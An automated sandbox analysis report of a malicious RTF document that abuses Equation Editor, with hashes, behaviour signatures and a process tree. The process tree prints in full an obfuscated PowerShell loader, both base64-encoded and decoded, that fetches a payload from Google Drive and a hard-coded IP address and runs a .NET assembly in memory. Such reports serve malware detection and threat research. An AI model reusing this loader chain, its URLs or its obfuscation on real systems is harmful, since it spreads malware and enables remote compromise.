Analysis
-
max time kernel
93s -
max time network
98s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
30-10-2024 02:06
Static task
static1
Behavioral task
behavioral1
Sample
15723c9ed5323a6dc5b7a407c37000456bff531f06bd9e7732278eb518445547.rtf
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
15723c9ed5323a6dc5b7a407c37000456bff531f06bd9e7732278eb518445547.rtf
Resource
win10v2004-20241007-en
General
-
Target
15723c9ed5323a6dc5b7a407c37000456bff531f06bd9e7732278eb518445547.rtf
-
Size
114KB
-
MD5
6fe3c24853e9de94688a2311999ba946
-
SHA1
c4383b6caefcb3050ee009394ed1ae07c4f8fd6e
-
SHA256
15723c9ed5323a6dc5b7a407c37000456bff531f06bd9e7732278eb518445547
-
SHA512
a1b12f0e1a44d7743d6159f71ab116c8b9e8499cb2d52bc8d1ae3e9f6bc91c3f16788c9be5526052f6bb23b65ceb730a9a46fa2ccd07de05dc30d51f7e9e81a3
-
SSDEEP
768:u+e7d8wnZX6sQ1j3ArcSGCTl4JkwHKTZ/rR7APQ8c:J/wnZ9Q1UrJWHaFAPQ3
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2788 EQNEDT32.EXE 6 2208 powershell.exe 8 2208 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1892 powershell.exe 2208 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2788 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2804 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1892 powershell.exe 2208 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1892 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2804 WINWORD.EXE 2804 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2788 wrote to memory of 2716 2788 EQNEDT32.EXE 31 PID 2788 wrote to memory of 2716 2788 EQNEDT32.EXE 31 PID 2788 wrote to memory of 2716 2788 EQNEDT32.EXE 31 PID 2788 wrote to memory of 2716 2788 EQNEDT32.EXE 31 PID 2716 wrote to memory of 1892 2716 WScript.exe 33 PID 2716 wrote to memory of 1892 2716 WScript.exe 33 PID 2716 wrote to memory of 1892 2716 WScript.exe 33 PID 2716 wrote to memory of 1892 2716 WScript.exe 33 PID 1892 wrote to memory of 2208 1892 powershell.exe 35 PID 1892 wrote to memory of 2208 1892 powershell.exe 35 PID 1892 wrote to memory of 2208 1892 powershell.exe 35 PID 1892 wrote to memory of 2208 1892 powershell.exe 35 PID 2804 wrote to memory of 2184 2804 WINWORD.EXE 36 PID 2804 wrote to memory of 2184 2804 WINWORD.EXE 36 PID 2804 wrote to memory of 2184 2804 WINWORD.EXE 36 PID 2804 wrote to memory of 2184 2804 WINWORD.EXE 36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\15723c9ed5323a6dc5b7a407c37000456bff531f06bd9e7732278eb518445547.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2184
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptiontogetbetterthings.vBs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVuVjpjb21zUEVjWzQsMjYsMjVdLUpPSU4nJykgKCgnTlY1aW1hZ2VVcmwgPSBuZjAnKydodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBuZjA7TlY1Jysnd2ViQ2xpZW50ID0gTmV3LU8nKydiamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtOVjVpbWFnZUJ5JysndGVzJysnID0gTlY1d2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShOVjVpbWFnZVVybCk7TlY1aW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoTlY1aScrJ21hZ2VCeXRlcyk7TlY1c3RhcnRGbCcrJ2FnID0gbmYwPDxCQVNFNjRfU1RBUlQ+Pm4nKydmMDtOVjVlbmRGbGFnID0gbmYwPDxCQVNFNjRfRU5EPj5uZjA7TlY1c3RhcnRJbmQnKydleCA9IE5WNWltYWdlVGV4dC5JbmRleE9mKE5WNXN0YXJ0RmwnKydhZyk7TlY1ZW5kSW5kZXggPSBOVjVpbWFnZVRleHQuJysnSW5kZScrJ3hPZihOVjUnKydlbmRGbGFnKTtOVjVzdGFyJysndEluZGV4IC1nZSAwIC1hbmQgTlY1ZW5kSW5kZXggLWd0IE5WNXN0YXJ0SW5kZXg7TlY1Jysnc3RhcicrJ3RJbmRleCArPSBOVjVzdGFydEZsYWcuTGVuZ3RoO05WNWJhc2U2NExlbmd0aCA9IE5WNWVuZEluZGV4IC0gTlY1c3RhcnRJbicrJ2RleCcrJztOVjViYXNlNjRDb21tYW5kID0gTlY1aW1hZ2VUZXh0LlN1YnN0cmknKyduZyhOVjVzdGFydEluZGV4LCBOVjViYXNlNjRMZW5ndGgpO05WNWJhJysnc2U2NFJldmVyc2VkID0gLWpvaW4gKE5WNWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBqMW0gRm9yRWFjaC1PYmplY3QgeyBOVjVfIH0pJysnWy0xLicrJy4tKE5WNWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07TlY1Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFMnKyd0cmluZyhOVjViYXNlNjRSZXZlcnNlZCk7TlY1bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmwnKydlY3Rpb24uQXNzJysnZW1ibHknKyddOicrJzpMb2FkKE5WNWNvbW1hbmRCeXRlcyk7TlY1dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChuZjBWQUluZjApO05WNScrJ3ZhaU1ldGhvZC5JbnYnKydva2UoTlY1bnVsbCwgQCcrJyhuZjB0eHQuREZGVEdGUlIvMDA1LzM5JysnMS42Ni4wNjEuNzEyLy86cHR0aG5mMCwgbmYwZGVzYXRpdmFkb25mMCwgbmYwZGVzYXRpdmFkb25mMCwgJysnbmYwZGVzYXRpdmFkJysnb25mMCwgbmYwQ2FzUG9sbmYwLCBuZjBkZXNhdGl2YWRvbmYwLCBuZjBkZXNhdGl2YWRvbmYwLG5mMGRlc2F0aXZhZG9uZjAsbmYwZGVzYXRpdmFkb25mMCxuZjBkZXNhdGl2YWRvJysnbmYwLG5mMGRlc2F0aXZhZG9uZjAsbmYwZGVzYXRpdmFkb25mMCxuZjAxbmYwLG5mMGRlc2F0aXZhZG8nKyduZjApKTsnKS5yZVBMYWNlKCdOVjUnLFtzdHJpTkddW0NIQVJdMzYpLnJlUExhY2UoJ2oxbScsW3N0cmlOR11bQ0hBUl0xMjQpLnJlUExhY2UoKFtDSEFSXTExMCtbQ0hBUl0xMDIrW0NIQVJdNDgpLFtzdHJpTkddW0NIQVJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $enV:comsPEc[4,26,25]-JOIN'') (('NV5imageUrl = nf0'+'https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur nf0;NV5'+'webClient = New-O'+'bject System.Net.WebClient;NV5imageBy'+'tes'+' = NV5webClient.Down'+'loadData(NV5imageUrl);NV5imageText = [Sy'+'stem.Text.Encodin'+'g]::UTF8.GetString(NV5i'+'mageBytes);NV5startFl'+'ag = nf0<<BASE64_START>>n'+'f0;NV5endFlag = nf0<<BASE64_END>>nf0;NV5startInd'+'ex = NV5imageText.IndexOf(NV5startFl'+'ag);NV5endIndex = NV5imageText.'+'Inde'+'xOf(NV5'+'endFlag);NV5star'+'tIndex -ge 0 -and NV5endIndex -gt NV5startIndex;NV5'+'star'+'tIndex += NV5startFlag.Length;NV5base64Length = NV5endIndex - NV5startIn'+'dex'+';NV5base64Command = NV5imageText.Substri'+'ng(NV5startIndex, NV5base64Length);NV5ba'+'se64Reversed = -join (NV5base64Command.ToCharArray() j1m ForEach-Object { NV5_ })'+'[-1.'+'.-(NV5base64Command.Length)];NV5commandBytes = [System.Convert]::FromBase64S'+'tring(NV5base64Reversed);NV5loadedAssembly = [System.Refl'+'ection.Ass'+'embly'+']:'+':Load(NV5commandBytes);NV5vaiMethod = [dnlib.IO.Home].GetMethod(nf0VAInf0);NV5'+'vaiMethod.Inv'+'oke(NV5null, @'+'(nf0txt.DFFTGFRR/005/39'+'1.66.061.712//:ptthnf0, nf0desativadonf0, nf0desativadonf0, '+'nf0desativad'+'onf0, nf0CasPolnf0, nf0desativadonf0, nf0desativadonf0,nf0desativadonf0,nf0desativadonf0,nf0desativado'+'nf0,nf0desativadonf0,nf0desativadonf0,nf01nf0,nf0desativado'+'nf0));').rePLace('NV5',[striNG][CHAR]36).rePLace('j1m',[striNG][CHAR]124).rePLace(([CHAR]110+[CHAR]102+[CHAR]48),[striNG][CHAR]39) )"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD59a07962706042fabb819d4273e955333
SHA15eeb0ae02ff43fc4e43aef5e964b60a279898b42
SHA25654ef4478b054001994d143584dc1d70c90cb3a4d00d243c839ccedb8a98410f0
SHA512f82607485f21c3f0128775f880f4ad620d6b5c015f2677a99a98584ccdaefabaac2679559252c702c58c930ed27a043fa8981bbfdb9eb7ef862264ec46429ccb
-
Filesize
137KB
MD5b449b07c0e73637082cf0ce69ed3de96
SHA1c034c97173223611719127c25f416d20f80a8227
SHA256667c141e33d78452d648708f5d618fcc1ca4ddee2c8e85a445e612004ce39b9d
SHA5120036936f7786b2f6102dfc99bd37866cb48def0849c638de2fc0b02d0b3020c225941395881b44cbe24422569e51f9f864505f6a04fc18734327d4babb2c5014